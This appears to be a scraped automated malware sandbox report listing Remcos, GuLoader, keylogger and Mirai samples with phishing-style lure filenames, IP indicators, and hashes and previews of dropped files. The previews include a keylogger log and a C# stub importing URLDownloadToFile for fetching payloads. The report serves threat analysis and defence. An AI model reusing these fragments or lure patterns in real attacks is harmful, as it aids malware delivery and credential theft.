                                                                                DHL_Shipping_Invoices_Awb_BL_000000000101620242247820020031808174Global180030010162024.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 192.169.69.26
                                                                                Purchase Order Braiconf SA #U2013 16.10.2024.pif.exeGet hashmaliciousRemcosBrowse
                                                                                • 192.169.69.26
                                                                                rSKGCROCOMANDAFABSRLM60_647746748846748347474.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 192.169.69.26
                                                                                QAOdeFQElg.exeGet hashmaliciousRevengeBrowse
                                                                                • 192.169.69.26
                                                                                x6cUyFYM0H.exeGet hashmaliciousRevengeBrowse
                                                                                • 192.169.69.26
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 208.115.121.72
                                                                                1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 192.169.69.26
                                                                                awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                                • 192.169.69.26
                                                                                17285146246cda698f45c36116d69e3d665b30150556a45a119b0a7872c0be692634077580118.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 192.169.69.26
                                                                                AS-COLOCROSSINGUSwethinkaboutthegreatsolutionforgreat.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                • 172.245.123.25
                                                                                ACCOUNTXSTATEMENT.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 172.245.123.25
                                                                                SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 192.3.101.153
                                                                                ecforyoutomakemegood.htaGet hashmaliciousCobalt Strike, AgentTesla, GuLoaderBrowse
                                                                                • 107.175.113.209
                                                                                Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                • 192.3.176.141
                                                                                Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                • 192.3.176.141
                                                                                Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                • 192.3.176.141
                                                                                Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousGuLoaderBrowse
                                                                                • 107.175.113.209
                                                                                Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                • 198.46.178.134
                                                                                Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                                                • 107.175.113.209
                                                                                ATOM86-ASATOM86NLrIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 178.237.33.50
                                                                                Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 178.237.33.50
                                                                                SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                New Order.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 178.237.33.50
                                                                                17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                FASTLYUShttps://shoutout.wix.com/so/abP9tNDlV/c?w=3l7661HU1QXfrlxhsiEng39pDUk08HpBaevjMtJB-KM.eyJ1IjoiaHR0cHM6Ly92ZXJpZnlmaWxlcy5naXRodWIuaW8vbWFuLyIsInIiOiI1N2VlOTAzYy01NWI5LTQzMWEtMzQ0Yi1lM2Y2MTY0YTdiNDIiLCJtIjoibWFpbCIsImMiOiIzNjA5ODM5OC0zMzdiLTQyZjUtYTE5MC1iMmU1MTdiZmVkNmMifQGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.199.109.153
                                                                                Ref 3da19258b840a42b7a065792b311c9a8210d3475.htmlGet hashmaliciousUnknownBrowse
                                                                                • 151.101.129.229
                                                                                SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.111.133
                                                                                SecuriteInfo.com.Win64.Malware-gen.31578.13203.exeGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                Media24.htmlGet hashmaliciousUnknownBrowse
                                                                                • 151.101.2.132
                                                                                https://digitaltechlifees.sa.com/4NWmu/#T1Get hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.193.229
                                                                                Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.110.133
                                                                                Shipping Documents (SHFYA).HTMLGet hashmaliciousUnknownBrowse
                                                                                • 151.101.2.137
                                                                                arm5.elfGet hashmaliciousMiraiBrowse
                                                                                • 104.156.89.59
                                                                                TNT Receipt_ 09004105.xlsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0eNew Order_Purchase_202401017.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.199.108.133
                                                                                Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                                                                • 185.199.108.133
                                                                                rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 185.199.108.133
                                                                                v2.0.pdfGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 185.199.108.133
                                                                                SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 185.199.108.133
                                                                                PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 185.199.108.133
                                                                                https://iplogger.ru/250925Get hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                SecuriteInfo.com.Win32.PWSX-gen.2892.1397.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.199.108.133
                                                                                SecuriteInfo.com.Win32.PWSX-gen.5562.5412.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.199.108.133
                                                                                No context
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):144
                                                                                Entropy (8bit):3.379519383183141
                                                                                Encrypted:false
                                                                                SSDEEP:3:rhlKlM+UlSlENplfsQ55JWRal2Jl+7R0DAlBG45klovDl6v:6lyIlENN55YcIeeDAlOWAv
                                                                                MD5:2E06EEED8B2CD213EB85A328F82A3939
                                                                                SHA1:A10E6BA547C011D62C6388C037A7B917F1C8A65D
                                                                                SHA-256:0ED8B6879EBB7339D3AEC7F1CFFE71522978534C3E4950A1B859208F5BE6BD32
                                                                                SHA-512:08CD3137FD4D5285CEAEA0B449EB8BB0FE0E416B489B8C7572D2006BAF323361902F6204079ACD6341D659A9FEC804F9C26DBEB89241163D9825DC5CF019E4AD
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                Preview:....[.2.0.2.4./.1.0./.1.7. .1.0.:.0.4.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):957
                                                                                Entropy (8bit):5.008295404649503
                                                                                Encrypted:false
                                                                                SSDEEP:24:qXdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:6PN0GX85mvhjTkvfEro
                                                                                MD5:96B063F9C5EF78A161994420DFEC25F2
                                                                                SHA1:FCFF5C810833BB7C878D9D74E1468E1347C75230
                                                                                SHA-256:2F61ACE63CC007BF73EA371A90020323E8252EB4D0274162CE31E5F45E09740E
                                                                                SHA-512:A8630CBFD24959CFCDDE23F10515F7D4CA50A83F63B7B6EA233EB09AFCA121008A8AA5214E81B64776E8331741BD57A9BD18C89399B7F9C076A666BEF1CD4BC1
                                                                                Malicious:false
                                                                                Preview:{. "geoplugin_request":"173.254.250.82",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):195828
                                                                                Entropy (8bit):3.734264769577845
                                                                                Encrypted:false
                                                                                SSDEEP:3072:yf2mvbW2RjvThlXRy/cgt5p4Gw2G2oir8/pvRecjDbHxic87:yfRvN9Th2/4BRecjDbHxU7
                                                                                MD5:9A8FFC29C5835F0DAE8EA49BFB6BF29D
                                                                                SHA1:1785396F191852732BC80AB9819D03905BD9F971
                                                                                SHA-256:DD3A11A501E3394E12D7FD48EE9A58FA2AA477B059F9DA5B4FF20D9C9EA84686
                                                                                SHA-512:8562AE76F5C2D41A64C01E99006E55E45A51F525B7E390B0563A5ECC48DF8334B0A8B205395C93EF9C811F5CA8A04A114AE2C58EAAC30FC2EAA150712096E168
                                                                                Malicious:false
                                                                                Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .i.x.o.r.a.(.s.i.g.m.a.t.i.s.m.o.,. .t.r.i.c.o.d.e.s.m.o.,. .a.c.a.t.a.m.e.n.t.o.,. .p.a.i.a.n.a.s.,. .o.r.d.e.n.a.d.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .a.c.a.t.a.m.e.n.t.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.a.s.e.(.
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1628158735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:NlllulP:NllU
                                                                                MD5:945462C07AE0FA1CBF07B7C6B820F7E5
                                                                                SHA1:DB903671DECE931CB39DBAEB0C294C4C2A189B0E
                                                                                SHA-256:7842F5BCAAB0D91923C908EA9CEC346245E993FF228725CF6F7E37F6F31383A1
                                                                                SHA-512:8BF0039194755F9236D45B152044C5540C6C613AC30C561708BB81076140FE2EDA8F108651B4C7042F8D7E0714F27269E59B6DC33884CD1067151899808CF520
                                                                                Malicious:false
                                                                                Preview:@...e................................................@..........
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (362)
                                                                                Category:dropped
                                                                                Size (bytes):488
                                                                                Entropy (8bit):3.9455808220232353
                                                                                Encrypted:false
                                                                                SSDEEP:6:V/DsYLDS81zuqXZnWldMOB7QXReKJ8SRHy4HMGmORXKmXvNcXo2FQy:V/DTLDfuqWbWXfHgWQCuXoLy
                                                                                MD5:3E2E82DA91A6FAB92B6B84593FF397E0
                                                                                SHA1:0BBD006424668476775D6428F709CA2D1EE7F213
                                                                                SHA-256:2BB84C7913D6A90EBD0D9F5CEAB30DF4C4829C02C8EEFD427B23A82772B0D8C6
                                                                                SHA-512:81DEDE5D323B38C021F3753C9372C331D9F45D3DA85DA125EE805365B28D340D4A67E40A31D8ED6E545E0BAE86C87BA801A422831C63E78FE1FEBEB818983A36
                                                                                Malicious:false
                                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace XdBLBwzSmge.{. public class qrUkCmMvaNH. {. [DllImport("uRLMON.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr kFRIOiBL,string oCYi,string oqLoYP,uint MDujvKK,IntPtr CIYogWtMer);.. }..}.
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):371
                                                                                Entropy (8bit):5.263142474945604
                                                                                Encrypted:false
                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f+f29Ozxs7+AEszI923f+f29D:p37Lvkmb6KzbOWZE2bD
                                                                                MD5:23EBD6FDA6C3EE3760DFFD5160EA05A7
                                                                                SHA1:6C4F273C65F636487201CB9B2E511C9C517A9089
                                                                                SHA-256:29C45C8E42935967B665A9547354AB6B797230C4C96C040F46E73AA60F821ACB
                                                                                SHA-512:2EC204E809DA72B0AE4E4A7EA3A5557E919A6B3FBF69688D8864306D493E9AF3CA84107118697C35144BFB25BFB7BCFCAE0CB8A71FB24ED0B15EFB01391A2062
                                                                                Malicious:true
                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.0.cs"
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3072
                                                                                Entropy (8bit):2.8876847542742468
                                                                                Encrypted:false
                                                                                SSDEEP:24:etGSAWpuYYNdl8mJlykIioRtkZfbbLtFWI+ycuZhN/akSRPNnq:6QY4+mJlYizJbbLm1ul/a3jq
                                                                                MD5:E1378FBC39D9EC829BAC6CA2794A610E
                                                                                SHA1:0436F6A8FC5FF7B15A70D285E7A5D96705C9C316
                                                                                SHA-256:3857FB719855366A45A7E644DDFC9152649DEE7F1A4CCE0F1BC825525A59B4A8
                                                                                SHA-512:EE77D66FAAE55B4872EB921F06EA57841382280B7E4503C3A7C67AD5097EC62121E99D811D0E10706032A990F84A0191E0399283BD6AA39E65EB91A1844DBB52
                                                                                Malicious:false
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.g...........!.................#... ...@....... ....................................@.................................l#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................?.8.......................................#.............. F.....P ......X.........^.....g.....l.....s.....{...X.....X...!.X.....X.......!.....*.......F......................................./..........<Module>.1n
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                Category:modified
                                                                                Size (bytes):870
                                                                                Entropy (8bit):5.320177251339487
                                                                                Encrypted:false
                                                                                SSDEEP:24:KMoqd3ka6KzrE2WKax5DqBVKVrdFAMBJTH:doika6arE2WK2DcVKdBJj
                                                                                MD5:5073DC279D1E50FDA293B215026AE7ED
                                                                                SHA1:85DEBE17A9901A78AA0165AAF1D07B4E70CB4FAD
                                                                                SHA-256:5E66C4804E2EB4261455FF783F5713AFE05B82152FE9AF441768FE17B2890702
                                                                                SHA-512:6BC8FC835D0E107C558A5F84D36CFF3D56FC0F7913F4A83855E1BC12057C0CF9927CFF876DD55514A1E304B52AC019E9D4AC281D51F8EA0D53D8FBD389F5510C
                                                                                Malicious:false
                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                File Type:MSVC .res
                                                                                Category:dropped
                                                                                Size (bytes):652
                                                                                Entropy (8bit):3.0996700036428275
                                                                                Encrypted:false
                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydak7YnqqRPN5Dlq5J:+RI+ycuZhN/akSRPNnqX
                                                                                MD5:C00CA9CB2DD7C8FA9EC6FE5A733B910B
                                                                                SHA1:5467AF3DD55B9922EB2175FAD1A868C79A8D1C66
                                                                                SHA-256:8AADD7807EE50683C6A92797FF186916F5C7CA08B31122A7D89393FF42026F35
                                                                                SHA-512:891513DD236B8E6CC4CF1DD153315A2963D00A8BE1D8AE7CD05A6E074273EEC538D4495ADDA461F6E33C70C2C2C7557B51069E903AE105DA6A493985602E61A3
                                                                                Malicious:false
                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.n.l.z.j.h.n.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.n.l.z.j.h.n.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Oct 17 15:28:20 2024, 1st section name ".debug$S"
                                                                                Category:dropped
                                                                                Size (bytes):1336
                                                                                Entropy (8bit):4.000108422647948
                                                                                Encrypted:false
                                                                                SSDEEP:24:HNm9pjkxeH5WwKTFexmfwI+ycuZhN/akSRPNnqSSd:cIxeLKTAxmo1ul/a3jqSC
                                                                                MD5:A43E930DAC8DD8187898F8589031F8A1
                                                                                SHA1:C14FC90617D2BAF0DCE21929873D0DCDC293112E
                                                                                SHA-256:201536DE263C762C534AB43C2C172A0BCC536C00F2504A068815A1E7C2868B46
                                                                                SHA-512:1D275C84C6303B619C712A86E607C79F560A555415E09F6C190F8543094CC15A4E4DD75F1E41047A5D55AA2268E29681B61B4C89862B9FF4DE0B241DB2C8CF04
                                                                                Malicious:false
                                                                                Preview:L....-.g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP......................-......Zs;............5.......C:\Users\user\AppData\Local\Temp\RESE985.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.n.l.z.j.h.n.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
